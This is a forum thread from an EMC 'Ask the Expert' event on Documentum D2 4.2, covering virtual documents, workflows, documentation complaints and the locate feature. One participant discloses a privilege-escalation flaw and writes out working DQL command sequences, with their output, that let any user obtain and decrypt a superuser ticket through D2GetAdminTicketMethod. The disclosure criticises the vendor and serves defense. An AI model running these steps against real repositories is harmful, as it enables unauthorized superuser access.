Ask the Expert: EMC Announced Documentum D2 4.2

In my opinion you should send a virtual document as work package. In this case you will be able to manage the lifecycle of each document of your Work Package.

D2 provides powerful option in order to manage VD and document inside your VD.

Goran Stepic wrote: the RSA Lockbox is a software-specific (can be hardware too) encrypted repository..... And what about usecases?

No comments? It's sad, let's read mine

The main D2 problem is it does not follow main concepts implemented in other Documentum products, for example: D2 does not use BOFv2 that makes it incompatible with other products, it actively uses docbase methods to perform some actions in web-interface (last time I had coded docbase method about 6 years ago), etc, etc. Technology level of D2 is somewhere between D5.3 and D6.0 . Another problem is D2 is not properly documented, actually this is a common problem for all Documentum products: when you install some product/application into repository you have no idea about what artifacts (objects types, users, groups, methods, etc) that product/application creates, moreover you have no idea about how to troubleshoot that product/application. So, before putting any Documentum product in production we always try to discover it functionality, and sometimes it brings a lot of fun sad (see also DCS Security Question), in November 2013 I discovered a vulnerability in D2 that allows any user to gain superuser privileges using D2GetAdminTicketMethod, it works by the following way:

1> create c6_method_return object set message='test'
2> go
object_created
--------------
00002ee280000e9b
(1 row affected)
1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d2 -password "" -method_return_id 00002ee280000e9b'
3> go
...
(1 row affected)
1> select message from c6_method_return where r_object_id='00002ee280000e9b'
2> go
message
--------------
DM_TICKET=T0.....
(1 row affected)

After that user can use admin ticket to login to repository with superuser privileges.

And EMC instead of increasing technology level of their product had invented new square wheel - lockbox (note they even didn't consider to use dynamic groups):

Actually, EMC always misses a fact that encryption does not replaces security (see also Re: Certificate-based SSL configuration problem) - when D4.2 was released I had checked whether security vulnerability was fixed or not, and the answer was - not:

New D2 behavior with lockbox:

1> create c6_method_return object set message='test'
2> go
object_created
----------------
00002f0a8000291d
(1 row affected)
1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d
3> -scope global -timeout 3600'
4> go
...
(1 row affected)
1> select message from c6_method_return where r_object_id='00002f0a8000291d'
2> go
message
----------------------------------------------------------------------------
AAAAEMm1Ypog8dNWsELGoge38HRKVIUnN4/vw4rmz8xJ7EcZuOaQ8rT6vAktbc8g5qV07pme7nt2
hG4D+ljeR2G5JCystXA8JDDaxmM5xjNfwshe9YldFZBlSinYBvFdigpuZCmTFES+n1b5ZbVC/L7b
aZ7UI1LI06YhJvRcVjB9mzwMENk8H7KaxDXiFBCEQSiNNn5DoXwjZPWLJd9WTdXIlXpPzWAR2KG+
44/DdBkvmi6A5v7+wF5+b0wR3saQFhxTX7Rfu/vVVFfvEehYAJNvDAvd/vtWvpJa+6N3Zmz+SZgH
q6x59int5a8CmSXhrZiflwcs+psMaOcStVyY/lYZGrGMdY4y9eEqn1psnQ+azA0cmfRZfn7uJJbc
KJmARVgaPFZN4FbEdbeu94PrNUU/lQrtKs+NaiwColY/WYEY8MlzkZhQ249koCHqgd07/TLdAX6l
9xCtvyIJf7cQeSi/4Xl4NlQ92O5RRFwPxIdHz0dhwSxnVptqGoRqMTcpw/NTJ5ldA5ZrhRnudAhi
iUt2b3PP0UBjVUjnpA9QD5sLR2DxUX4ysUbI2MDoYlzcnL5MYWLvEqq3K6gPXA8YJAgUwIIYbDqo
rXZEtet2cAl5zKCgDAqL6AqIPzcFn1sIDqy6p72D1kvQF4iFs2oQJZAT55j+C6SGcm4DoJYskpGg
/AwBiE0YFQX2zqjwqbSPcGSoIZDmoPZFELGjySl0xxjWcwW5HXh7194j73FW2FV82cMNZVIyf2/f
gWRMt+rw315VhwORReJYfMhibTBHR+CC+ySOetT7xvEMBVarfEOUHqGvs9hLZWYhgpBa2EgBKUZQ
jFBRe2SmK1E0aR7hmS1zbdATDJJGNhP9PrDLaHelunjgawEoAoMilY51EPgwqI2MuA==
(1 row affected)

here D2GetAdminTicketMethod returns encrypted ticked, and attacker need to perform another execution of D2GetAdminTicketMethod to decrypt ticket:

1> update c6_method_return object
2> set parameter_name[0]='-timeout',
3> set parameter_value[0]=(select message from c6_method_return
4> where r_object_id='00002f0a8000291d')
5> where r_object_id='00002f0a8000291d'
6> go
objects_updated
---------------
              1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info:  "1 objects were affected by your UPDATE statement."

1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d
3> -scope global'
4> go
...
(1 row affected)

1> select error from c6_method_return where r_object_id='00002f0a8000291d'
2> go
error
----------------------------------------------------------------------------
For input string: "DM_TICKET=T0JKIE5VTEwgMAoxMwp2ZXJzaW9uIElOVCBTIDAKMwpmbGFncyBJTlQ
(1 row affected)

PanfilovAB  you mark a point ...

Just a question, but I'm sure you already did it, did you open a new SR ?? What's the EMC answer to this security failure...

plasher  What's your tought about VD for your need ?

Jullien,

I thought here we were discussing D4.2 features, but not EMC support. And I do think I gave a complete answer about lockbox functionality (i.e. why it was introduced, why it does not work)  rather than put some marketing stuff.

Is there a plan to release a object reference for all the object types that D2 creates?

Thank You.

We currently deliberating the option of using Virtual Documents. Any thoughts about our other two question topics?

We're working on a white paper that will document the runtime objects used by D2.  It should be available in the next couple of weeks.

@plasher : External tasks are used to send task to external user (i.e. : Users that haven't got access to D2). This users will be able to accept or reject this task sending an email to a specific address.

To send an email with multiple attachment, you should consider develop a method server and trigger it on your specific lifecycle change. There is no automatic feature like this... Otherwise, maybe with the distribution process.

silverj wrote: We're working on a white paper that will document the runtime objects used by D2.  It should be available in the next couple of weeks.

Brilliant! Who had invented such ridiculous way (white papers instead of official documentation, xCelerators instead of core functionality) to provide documentation and functionality for customers? Why do not accept candy wrappers as payments in such case?

Just before closing this event : What's the EMC answer about the security failure that Panfilov exposes earlier ?

It seems a very important subject for customer and partner !

It seems a very important subject for customer and partner !

Nobody cares

This Ask the Expert event has now ended. Thanks to our experts and those who participated in the discussion!

Just so you know, we're NOW having the folowing ATE evenst:

Ask the Expert: EMC Announced xCP 2.1

Ask the Expert: All about VMAX performance best practices

Please, join us or let your peers know about it.

Cheers!

Some examples from an end user point of view :

- Same version of a document can be located into various folder, then you may want to go into a specific folder link.

- Also, locate feature is useful when you want to reach a document from the relationship widget ("where is located this document that is linked to my document ?")

what is the use of locate feature in D2 4.2 . As when we are in the location of the document we will be knowing the location of the document in the widget.then why use locate featuer

hi,

may i know how to create workspace for specific users or groups.Thanks in advance